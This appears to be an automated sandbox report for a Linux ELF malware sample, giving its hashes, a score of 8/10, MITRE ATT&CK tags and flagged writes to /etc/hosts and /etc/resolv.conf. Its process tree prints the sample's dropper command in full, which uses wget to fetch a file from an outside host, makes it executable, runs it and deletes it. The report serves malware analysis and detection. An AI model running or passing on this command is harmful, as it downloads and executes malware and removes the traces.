b7d0d17ea7871db4d8faf0ddddf30ce24ca142574b48362f7f82ca349ec9e2f4

Analysis

max time kernel
0s
max time network
103s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
03-09-2022 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e4921180eafa91a234b1034c772ba887.elf
Size

46KB
MD5

e4921180eafa91a234b1034c772ba887
SHA1

8c66fd601cac2611b22bd69a7862b25e8b9a2e36
SHA256

b7d0d17ea7871db4d8faf0ddddf30ce24ca142574b48362f7f82ca349ec9e2f4
SHA512

3004c1632e15d54a72dc4665351699ae65494abf15f000982d3dcedff77ffcf755b6dd18316694ad8d688166d120051f0a59c9f2e8965eaab8c880bf54ca8327
SSDEEP

768:eRxm/aDxX7Wq3X5RJrdNW3Jq/BgxSh//Id8Np/JIB+Mq0uwcS:0US9X7PnDA3JquK//IWp/JBDScS

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.

Processes:

wget

description ioc process

/etc/hosts /etc/hosts wget
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

wget

description ioc process

/etc/resolv.conf /etc/resolv.conf wget

description	ioc	process
/etc/hosts	/etc/hosts	wget

description	ioc	process
/etc/resolv.conf	/etc/resolv.conf	wget

/tmp/e4921180eafa91a234b1034c772ba887.elf
/tmp/e4921180eafa91a234b1034c772ba887.elf
1⤵
PID:592

/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../cipher -O .....;chmod 777 .....;./.....;rm -rf ..... "
1⤵
PID:595

/usr/bin/wget
wget -q http://gay.energy/.../cipher -O .....
2⤵
- Modifies hosts file
- Writes DNS configuration
PID:596

/bin/chmod
chmod 777 .....
2⤵
PID:597

./.....
./.....
2⤵
PID:598

/bin/sh
/bin/sh ./.....
2⤵
PID:598

/bin/rm
rm -rf .....
2⤵
PID:600

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Dynamic Resolution

T1568

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads